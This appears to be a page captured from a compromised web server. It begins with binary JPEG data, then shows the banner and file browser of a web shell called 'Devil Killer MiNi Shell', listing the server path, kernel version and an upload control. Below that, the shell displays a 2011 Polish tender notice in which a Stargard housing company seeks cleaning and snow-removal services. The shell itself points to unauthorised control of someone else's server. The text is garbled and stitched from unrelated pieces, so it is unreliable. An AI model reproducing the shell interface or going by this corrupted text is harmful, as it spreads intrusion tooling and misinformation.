JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110307/37006-N-2011.html

<p class="kh_header"><b>Stargard Szczeciński: Sprzątanie wewnątrz 37 budynków mieszkalnych  powierzchni 8 399m2 ,utrzymanie w czystości przylegających do 40 budynków terenów zewnętrznych o powierzchni 11 660m2  oraz utrzymanie w czystości innych terenów ogólnodostępnych o powierzchni 15 341m2 przy obiektach administrowanych przez Stargardzkie  Towarzystwo Budownictwa Społecznego Spółka z o.o, na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3543 m2 wraz z pawilonem socjalnym o powierzchni 40 m2 oraz innych terenów ogólnodostępnych o powierzchni 12103 m2</b><br>
<b>Numer ogłoszenia: 37006 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stargardzkie Towarzystwo Budownictwa Społecznego Sp.z o.o. , ul. A. Struga 29, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5784750, faks 091 577 15 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.tbs.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podmiot prawa handlowego  spółka ze 100% udziałem miasta -gminy Stargard Szczeciński.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie wewnątrz 37 budynków mieszkalnych  powierzchni 8 399m2 ,utrzymanie w czystości przylegających do 40 budynków terenów zewnętrznych o powierzchni 11 660m2  oraz utrzymanie w czystości innych terenów ogólnodostępnych o powierzchni 15 341m2 przy obiektach administrowanych przez Stargardzkie  Towarzystwo Budownictwa Społecznego Spółka z o.o, na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3543 m2 wraz z pawilonem socjalnym o powierzchni 40 m2 oraz innych terenów ogólnodostępnych o powierzchni 12103 m2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i  czystości  wewnątrz  budynku  (dotyczy zadania nr 1 i 2)
1.	Częstotliwość i zakres świadczonych usług:
a)	codziennie -sprzątanie pomieszczeń klatki schodowej, korytarzy
b)	dwa razy w miesiącu- sprzątanie schodów i korytarzy piwnicznych, oraz pomieszczeń wspólnego użytku tj. pralni, suszarni
c)	raz w miesiącu- mycie wodą  ze środkami myjącymi np. proszkiem, mydłem podestów, biegów, poręczy , klatek schodowych, sieni, korytarzy
d)	raz w kwartale- sprzątanie strychów, oraz oczyszczanie studzienki wodomierzowej w budynku i poza budynkiem
e)	dwa razy w roku - na wiosnę przed Świętami Wielkanocnymi i jesienią na przełomie  października i listopada mycie  środkami do tego przeznaczonymi okien i drzwi, lamperii na klatce schodowej,  mycie szyb, kloszy oświetlenia na klatce schodowej, korytarzach i pomieszczeniach wspólnego użytku 
2.	Przez sprzątanie strony rozumieją zamiatanie, zbieranie śmieci,  usuwanie pajęczyn i kurzu oraz wykonywanie innych czynności związanych z utrzymaniem czystości w budynkach
3.	Sprzątanie i mycie w  budynku ma się odbywać w czasie najmniej uciążliwym dla mieszkańców domu, a czynności codziennego sprzątania  powinny zostać zakończone do godz. 13°°.
4.	Sprzątanie wykonuje się  w dni robocze, jeżeli liczba dni wolnych od pracy następujących po sobie wynosi więcej niż dwa, Wykonawca obowiązany jest posprzątać, zlecone  tereny wewnętrzne i zewnętrzne co najmniej w jednym dniu wolnym od pracy.
Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości wokół budynku i na zieleńcach przydomowych oraz na dojściach, chodnikach ( dotyczy zadania nr 1 i 2)
1.	Częstotliwość i zakres świadczonych usług:
a)	Codziennie:
-sprzątanie podwórzy, parkingu, osłon  śmietnikowych , dróg  wewnętrznych   i innych miejsc gromadzenia nieczystości,
-w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z parkingów, chodników, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
-likwidacja   gołoledzi i śliskości pośniegowej  z zastosowaniem środków stosownie do postanowień Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków , jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. z 2005 r nr 230 poz. 1960). Likwidacja gołoledzi i śliskości pośniegowej powinna odbywać się stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska.
b)	raz w tygodniu - w okresie od 1 kwietnia do 31 października oraz raz w miesiącu- w okresie od  01 listopada do 31 marca w dniach wywozu nieczystości stałych, dezynfekcja opróżnionych pojemników    na nieczystości i osłon śmietnikowych środkiem dezynfekującym np. Podchloryn Sodowy, Śmieciotox, Vigonez lub innymi podobnymi. Wykonawca zobowiązany jest kontrolować stan pojemników na nieczystości, informować Zamawiającego na bieżąco o  zauważonych brakach lub uszkodzeniach pojemników oraz o potrzebie ich wymiany lub uzupełnienia
2.	Sprzątanie dojść do osłon śmietnikowych, chodników, parkingów  w  okresie zimowym ponadto systematyczne usuwanie z dojść, parkingów i chodników śniegu, błota i lodu, zwalczanie śliskości i gołoledzi.
3.	Przez sprzątanie strony rozumieją usuwanie zanieczyszczeń , o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U z 2005 r nr 236 poz.2008 z późn. zm.) znajdujących się na terenach objętych przedmiotowym zamówieniem. Zanieczyszczeniami są w szczególności : błoto, piasek, kamienie, muł, żwir, niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania, papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia wynikające z ruchu pieszego. Sprzątanie ponadto obejmuje usuwanie śniegu z przejść, chodników, parkingu, dróg wewnętrznych, posypywanie piaskiem, dezynfekcja opróżnionych pojemników na śmieci oraz wykonywanie innych czynności związanych z utrzymaniem czystości na terenach zewnętrznych zlokalizowanych budynkach
4.	Do obowiązków Wykonawcy należy dbałość o ład i porządek w osłonach śmietnikowych, przy pojemnikach na terenie i w ich otoczeniu. Wykonawca zobowiązany jest do usuwania zalegających nieczystości do pojemników. Wykonawca obowiązany jest informować Zamawiającego o zakłóceniach w wywozie nieczystości.
5.	Sprzątanie chodników latem Wykonawca powinien zakończyć do godz. 9.00,natomiast  zimowe   oczyszczanie ze śniegu, lodu i błota   nawierzchni chodników i dojść    do osłon śmietnikowych oraz zapobieganie śliskości Wykonawca obowiązany jest zakończyć do godz.  7°° rano. Nie dotyczy to ciągłych opadów  śniegu i marznącej mżawki powodującej gołoledź kiedy obowiązuje zasada stałej i bieżącej obsługi.
       6.Wykonawca jest zobowiązany do zgrabiania w miarę potrzeby opadłych  liści z obsługiwanych 
          zieleńców. Po zgrabieniu liści  worki z odpadami należy umieścić przy altanach śmietnikowych 
          oraz  niezwłocznie   powiadomić o tym fakcie Zamawiającego 
      7.Wykonawca zapewnia  we własnym zakresie odpowiednie materiały (np. środki
         czystości, worki , środki dezynfekujące ) oraz narzędzia do wykonywania prac zgodnie z przedmiotem
         zamówienia.
8.Oprócz obsługi budynków i terenów polegającej na letnim i zimowym utrzymania porządku i czystości,
   do obowiązków Wykonawcy należy również:
-informowanie Zamawiającego na piśmie o zauważonych uszkodzeniach elementów klatki schodowej lub elewacji,  pomieszczeń i urządzeń wspólnego użytku i udzielenie pomocy w ewentualnym wykryciu sprawców,
-dekoracja flagami budynków z okazji świąt państwowych i lokalnych,
-rozwieszanie  w budynkach   zawiadomień   i   informacji   urzędowych lokalnych dotyczących mieszkańców domu,
-roznoszenie korespondencji dot. mieszkańców domu, aneksów, powiadomień o zmianie opłat,
Zadania i obowiązki Wykonawcy w zakresie letniego i zimowego utrzymania porządku i czystości
na terenach zewnętrznych ogólnodostępnych (dotyczy zadania nr 1 i 2):
1.	Codziennie
-sprzątanie  całego zleconego obszaru 
-sprzątanie chodników, parkingów, dojść ,a w okresie zimowym ponadto usuwanie z chodników  dojść, parkingu, śniegu, błota i lodu, 
-w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z parkingów, chodników, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
-ikwidacja   gołoledzi i śliskości pośniegowej  z zastosowaniem środków stosownie do postanowień Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków , jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. z 2005 r nr 230 poz. 1960). Likwidacja gołoledzi i śliskości pośniegowej powinna odbywać się stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska.
2.	Przez sprzątanie strony rozumieją usuwanie zanieczyszczeń , o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U z 2005 r nr 236 poz.2008 z późn. zm.) znajdujących się na terenach objętych przedmiotowym zamówieniem. Zanieczyszczeniami są w szczególności : błoto, piasek, kamienie, muł, żwir, niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania, papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia wynikające z ruchu pieszego. Sprzątanie ponadto obejmuje usuwanie śniegu z przejść, chodników, parkingu, dróg wewnętrznych, posypywanie piaskiem.
3.	Sprzątanie terenów latem Wykonawca powinien zakończyć do godz. 9.00,natomiast  zimowe   oczyszczanie ze śniegu, lodu i błota   nawierzchni chodników i różnego rodzaju dojść oraz zapobieganie śliskości Wykonawca obowiązany jest zakończyć do godz.  7°° rano. Nie dotyczy to  ciągłych opadów  śniegu i marznącej mżawki powodującej gołoledź kiedy obowiązuje zasada stałej i bieżącej obsługi.
4.	Wykonawca zapewnia we własnym zakresie odpowiednie materiały (np.  worki  ) oraz narzędzia do wykonywania prac zgodnie z przedmiotem zamówienia.
5.	Do obowiązków Wykonawcy  w okresie zimowym należy również oczyszczanie ze śniegu i błota wpustów ulicznych, zasuw wodnych i hydrantów pożarowych w sposób zapewniający swobodny spływ wody w czasie odwilży oraz w celu łatwego zlokalizowania tych urządzeń na wypadek awarii lub pożaru.
6.	Wykonawca jest zobowiązany do zgrabiania w miarę potrzeby opadłych liści z obsługiwanych zieleńców. Po zgrabieniu liści worki z odpadami należy umieścić w miejscu wskazanym przez Zamawiającego i   niezwłocznie powiadomić o tym fakcie Zamawiającego 
7.	Wykonawca zobowiązany jest dbać o ład i porządek w miejscach składowania nieczystości, na 
       terenie i w obrębie tych miejsc
Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3 543 m2 (dotyczy zadania nr 3):
1.	Codzienne 
-sprzątanie po zakończeniu handlu (w okresie letnim po godz. 1800, w okresie zimowym po godz. 1600) terenu targowiska polegające na zamiataniu śmieci, papierów, zmiotek i innych zanieczyszczeń zalegających na placu.
-mycie stołów - straganów.
-sprzątanie części chodnika wzdłuż placu targowego od strony ul. Słowackiego  ,a w okresie zimowym ponadto usuwanie z chodnika śniegu, błota i lodu, 
-w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z chodnika, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
-ikwidacja gołoledzi i śliskości pośniegowej  z zastosowaniem środków stosownie do postanowień Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków , jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. z 2005 r nr 230 poz. 1960). Likwidacja gołoledzi i śliskości pośniegowej powinna odbywać się stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska.
-sprzątanie  w pawilonie socjalnym obejmuje:
a)	mycie podłóg, czyszczenie i odkurzanie  powierzchni mebli i wyposażenia biurowego w pomieszczeniu biurowym
b)	mycie podłóg, glazury, drzwi, ścian, luster, urządzeń i armatury sanitarnej oraz opróżnianie koszy w dwóch pomieszczeniach w-c 
-sprzątanie pomieszczenia socjalnego i pomieszczenia na pojemniki w pawilonie socjalnym.
2.	Dwa razy w roku tj przed Świętami Bożego Narodzenia i Wielkanocnymi  mycie okien w pawilonie socjalnym,
3.	Raz w tygodniu mycie ścian i drzwi w pawilonie socjalnym.

4.	Przez sprzątanie strony rozumieją usuwanie zanieczyszczeń , o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U z 2005 r nr 236 poz.2008 z późn. zm.) znajdujących się na terenach objętych przedmiotowym zamówieniem. Zanieczyszczeniami są w szczególności : błoto, piasek, kamienie, muł, żwir, niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania, papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia wynikające z ruchu pieszego. Sprzątanie ponadto obejmuje usuwanie śniegu z przejść, chodników, dróg wewnętrznych, posypywanie piaskiem, dezynfekcja opróżnionych pojemników na śmieci oraz wykonywanie innych czynności związanych z utrzymaniem czystości na terenie targowiska
5.	Przeprowadzanie dezynfekcji opróżnionych pojemników na nieczystości przy pomocy środków dezynfekcyjnych w miarę potrzeby w dniach wywozu nieczystości.

Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości na terenach zewnętrznych ogólnodostępnych na zgłoszenie (dotyczy zadania nr 4):
1.	Sprzątanie -przez które strony rozumieją zbieranie śmieci, zamiatanie i grabienie  terenów objętych przedmiotowym zamówieniem.
2.	Zanieczyszczeniami są w szczególności : błoto, piasek, kamienie, muł, żwir niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania,  papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia  wynikające z ruchu pieszego
3.	Zebranie z  terenu  zanieczyszczeń wymienionych w ust 2., w worki na odpady, które  należy umieścić w miejscu wskazanym przez Zamawiającego, za wyjątkiem piasku, kamieni, mułu i żwiru, które należy spryzmować  w miejscu wskazanym przez  Zamawiającego..
4.	Wykonawca zapewnia we własnym zakresie odpowiednie materiały (np.  worki) oraz narzędzia do wykonywania prac zgodnie z przedmiotem zamówienia.
5.	Prace , o których mowa w ust 1,3 odbywać się będą doraźnie na pisemne zgłoszenie Zamawiającego.
6.	Zamawiający przekazuje Wykonawcy zgłoszenia drogą faksową, Wykonawca niezwłocznie potwierdza fakt ich otrzymania również faksem.
7.	 Ilość zgłoszeń będzie wynikać z potrzeb należytego utrzymania porządku i czystości zleconych terenów i będzie wynosić : minimum 4 razy a maksymalnie 12 razy w okresie wykonywania zamówienia.
8.	Prace należy  zakończyć w terminie 7 dni od otrzymania informacji o  konieczności wykonania usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamówienie uzupełniajace obejmuje taki sam przedmiot i zakres jak zamówienie podstawowe</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.60.00.00-3, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca  zobowiązany jest wnieść wadium w wysokości 
 Zadanie   I -2 000,00zł
 Zadanie  II  -1 800,00zł
 Zadanie  III -1 000,00zł
      W jednej lub kilku następujących formach
-Gwarancjach bankowych lub ubezpieczeniowych,
-Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,
-Poręczeniach udzielanych przez podmioty, o których mowa w art. 45 ust.6 pkt 5 Pzp
-Pieniądzu
Wadium w poręczeniach lub gwarancjach musi obejmować okres  związania ofertą
Gwarancje lub poręczenia w formie oryginału należy załączyć do oferty.
Gwarancje i poręczenia winny zawierać określenie przetargu ( jego nazwę), nazwę wykonawcy, zamawiającego, wysokość gwarantowanej lub poręczanej kwoty wadium, termin ważności nie krótszy niż okres związania ofertą oraz zobowiązanie gwaranta lub poręczyciela do bezwarunkowej i nieodwołalnej zapłaty należności, na pierwsze żądanie zamawiającego, w przypadkach  utraty wadium określonych w art. 46 ust.4a i 5 ustawy Pzp oraz wyszczególniać  poniższe okoliczności w jakich zamawiający może zatrzymać wadium wraz z odsetkami
-Jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust.3 ustawy Pzp nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust. Pzp lub pełnomocnictw,
-Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn lezących po stronie wykonawcy.
Wadium w formie pieniężnej winno wpłynąć najpóźniej w dniu 14.03.2011 r. na rachunek     zamawiającego w Banku PEKAO S.A. Oddział Stargard Szczeciński nr 
10 1240 3901 1111 0000 4220 4466
 i opisywać odpowiednio
Wadium przetarg sprzątanie wewnątrz budynków mieszkalnych i utrzymanie w czystości przylegających do nich terenów zewnętrznych zadanie I lub zadanie II  lub Wadium przetarg sprzątanie targowiska- zadanie III.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku wykonawca obowiązany jest wykazać
-Wykonanie usług w okresie ostatnich trzech  lat, jeżeli okres prowadzenia działalności jest krótszy- w tym okresie , odpowiadających swoim rodzajem i wielkością  usługom stanowiącym przedmiot zamówienia, Zamawiający rozumie przez to sprzątanie wewnątrz budynków mieszkalnych  i przylegających do nich terenów zewnętrznych  o łącznej wartości usług w ciągu każdego miesiąca  na kwotę co najmniej 
a)	5 500,00 zł brutto i łącznej  powierzchni sprzątanej budynków co najmniej 6 000m2  i terenów zewnętrznych 14 000m2  w odniesieniu do zadania I,
b)	5 000,00zł brutto i łącznej  powierzchni sprzątanej budynków co najmniej 3 500m2  i terenów zewnętrznych 14 000 m2  w odniesieniu do zadania II
c)	3 000,00 zł brutto i łącznej  powierzchni sprzątanej co najmniej 3 500,00 m2  w odniesieniu do zadania III,
z podaniem ich wartości oraz dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie ( np. faktury wraz z referencjami lub umowy wraz z referencjami)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku wykonawca obowiązany jest wykazać się  średniomiesięcznym zatrudnieniem na poziomie co najmniej 6 osób w odniesieniu do zadania I , w odniesieniu do zadania II co najmniej 5 osób , 2 osób w odniesieniu do zadania III w okresie ostatnich trzech lat, a  w przypadku gdy okres prowadzenia działalności jest krótszy  w tym okresie, dla których odprowadzane są składki ZUS</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku wykonawca obowiązany jest wykazać się posiadaniem środków  finansowych  lub zdolnościkredytowej w kwocie co najmniej 5 cyfrowej w pełnych złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

